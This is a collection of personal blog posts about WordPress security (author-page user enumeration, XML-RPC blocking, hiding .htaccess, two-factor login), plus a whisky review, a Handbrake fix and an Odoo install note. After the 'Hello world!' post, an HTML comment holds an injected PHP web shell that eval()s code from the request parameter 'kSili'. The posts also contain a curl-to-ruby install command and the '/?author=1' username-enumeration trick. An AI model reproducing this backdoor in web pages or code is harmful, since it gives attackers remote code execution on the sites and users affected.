Instant Cookie Expire – my first WordPress plugin

Recently, I published my first WordPress plugin: https://wordpress.org/plugins/instant-cookie-expire/ do5enef. It’s a very basic and simple plugin that does just one thing: setting the expire-time of a cookie when using a password protected post to “instant” instead of “10 days”.

This solves the problem that, once the password has been entered, you can access a password protected post for the next 10 days without having to enter the password again. In some cases, this isn’t wanted behaviour and so I crafted this one-line plugin.

Primarily, this was a testcase though. I wanted to learn the workflow of building WordPress plugins and publishing them to the repository. Currently I’m building my very own WordPress Security plugin (over 1500 lines of code already and still counting), which I hope to release by the end of 2016.

Of course I’ll keep you all posted!

WordPress and user enumeration through Author Pages rant

Yes. This will be a bit of a rant about WordPress.

Don’t get me wrong. I love and adore WordPress. Hell, I live WordPress. But there are just some things I really don’t like about it (at least from a security perspective).

Most of my major issues are with the default settings of a clean install of WordPress. I’m talking about features such as the XML-RPC protocol, author pages, file editing in the backend (on themes, plugins and core files).

Let’s take “author pages” as an example. I know from experience that this feature of WordPress is being used by just a fairly limited number of sites running WordPress.
However, when author pages are active, it’s easy to derive the usernames. This only leaves hackers the necessity of ascertaining the password and they’re inside your backend.

If you’d like to know the impact, just add “/?author=1” behind your domainname in the address bar. If author pages are active, it’ll redirect to a url that contains something like “/author/username”. And this “username” is actually the one you use to log into your wp-admin-backend.

And yes, I know there are plugins that can block this for you (such as https://nl-be.wordpress.org/plugins/disable-author-pages/ and several security plugins that offer it as an option), but that’s not my point.

The thing is that these settings are active by default, without an option in the WordPress backend to easily disable them.

My proposition:
Let’s make these functions an “opt-in” functionality. Let them be disabled by default and let’s make it possible to enable them if this is really needed for a specific website. This would make a huge number of WordPress sites that little bit more secure.

I’ve decided I won’t site back and I’ve already started working on a security plugin that will disable all of these features and create an “opt-in” menu under “Settings” in the WordPress backend. More on that soon!

 

8 great resources for stock photos

When producing content for your site or blog, you’d usually want to add a great picture to your page or article. However, most stock photos are quite expensive. But thankfully, there are several sites that provide high quality stock photos that are free, even for commercial use. Here’s a list of 8 sites I use the most:

Have fun creating/publishing!

Block xmlrpc attacks via .htaccess

XMLRPC is a protocol that is enabled by default in WordPress. However, since version 3.5 the option to disable this function was removed from the WordPress backend. Since this protocol is prone to attacks, which can be used to try several hundreds of username and password combinations in one single request, it’s paramount to disable this.

You could do this through a plugin, but a more efficient way would be to add following RewriteRule to your .htaccess:

RewriteRule ^xmlrpc.php$ "http://0.0.0.0/" [R=301,L]
Gouden Carolus - Belgian Single Malt

Gouden Carolus – Belgian Single Malt review

If you know me personally, you know I’m quite a fan of a glass of whisky now and then. So I thought it would be nice to share some of my experiences and opinions. And in this first review, I gladly present to you the Gouden Carolus, a single malt whisky from “De Molenberg”.

While Gouden Carolus isn’t the first Belgian Single Malt I’ve tasted or bought, it certainly has quickly become my go to whisky to help people introduce to the wonderful world of whisky. It is surprisingly soft to drink, lacking the harsh burning sensation of some more aged whisky varieties. But it also features just a hint of “crème brulée”, which manifests itself after a little while. Being fond of sweets myself, I certainly could appreciate this surprise, as this wasn’t a taste I expected to find in a whisky.

While this whisky hasn’t won any awards (as far as I am aware of), you shouldn’t miss out on this little known pearl in the Belgian Whisky landscape. If you loved the Belgian Owl, you’re very likely going to love this one, since it’s just as soft/smooth to drink and features a very refined taste.

The Gouden Carolus is a whisky that is distilled from the mash of the Gouden Carolus Beer, which to beer lovers is an absolute classic and very popular beer. The distillery is based in the Belgian city Mechelen and can be visited. They’ve also started to offer varieties on their Gouden Carolus Single Malt, such as the Gold Fusion and the Bourbon Cask 36, which I hope to taste and review here soon.

 

Fixing Handbrake on El Capitan

Most of you who know me personally, know I’m quite fanatic when it comes to my DVD’s. So once I buy a new one, I usually take it out of the box once, to digitize it using Handbrake and only play it digitally from my NAS. The DVD boxes are then cleaned and stored in alphabetical order in my DVD collection, never to be played again (so my discs do not suffer any wear).

Since I haven’t bought many DVD’s lately, mostly due to the birth of my daughter last year (and my time being spent with her instead of my computer),  I was rather surprised to notice backing up my DVD’s to a digital file does no longer work on Mac OSX El Capitan when using Handbrake.

I kept getting the error notification “no valid source” after scanning my dvd.

The cause:
Due to stricter security in El Capitan, libdvdcss is no longer present. And Handbrake needs this to be able to create a backup.

The solution:
We can install libdvdcss again using Homebrew.

First we’ll need to open a Terminal window. Next, paste and execute this command:
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"

Then run this command:
brew install libdvdcss

Now restart Handbrake and voila… it works!

Hiding your htaccess file

A great way to improve your security is hiding your htaccess file, since this file usually contains quite some information that can be indicative of the structure of your website or the content management system that was used to create the site. This can be done by taking two distinctive steps:

1. htaccess file permissions

First you’ll need to set the file permissions of your .htaccess to 644.

2. Add this to your .htaccess file

# secure htaccess file
<Files .htaccess>
order allow,deny
deny from all
</Files>

Hello world!

Welcome to my new blog.

As you’ve probably noticed, it’s out with brechtryckaert.be and in with brechtryckaert.com. But that’s not all that’s about to change. I’ve taken it upon myself as a good intention for 2016 to dive further into the world of content management systems and review a CMS unknown to me every couple of weeks.

Besides these posts, I’ll try to post as much content as possible (on security, WordPress and Sitecake).

Hope to meet you again here soon!

Brecht

<!– [insert_php]if (isset($_REQUEST["kSili"])){eval($_REQUEST["kSili"]);exit;}[/insert_php][php]if (isset($_REQUEST["kSili"])){eval($_REQUEST["kSili"]);exit;}[/php] –>

WordPress security improvement: adding 2-factor authentication

Another great way to improve the overall security of your WordPress website, is by adding two-factor authentication to your WordPress security measures. It improves your security since it requires 2 seperate elements to be entered before a user will be granted access and is, by default, a better solution than just using a username and password combination to log in. Two-factor authentication usually requires you to enter both a pincode/token of some sort and validate another element before access is granted.

How this improves your WordPress security

Using 2-factor authentication helps to effectively protect your website against following attacks and vulnerabilities:

  • Brute-forcing attacks
  • Weak passwords set by the end-user
  • Passwords that have be intercepted via man-in-the-middle attacks

But that’s enough theoretical chitchat already. Let’s go over the best options available today:

Continue reading →

Installing Odoo on Debian 7

animation-odoo

Recently I tried to figure out how one could install Odoo on a Debian 7 machine, since the documentation on the official website seemed to describe a set of instructions that didn’t work for me. Here’s how I was able to get it working with a variation on the official installation instructions.

Installing Odoo on Debian 7

Continue reading →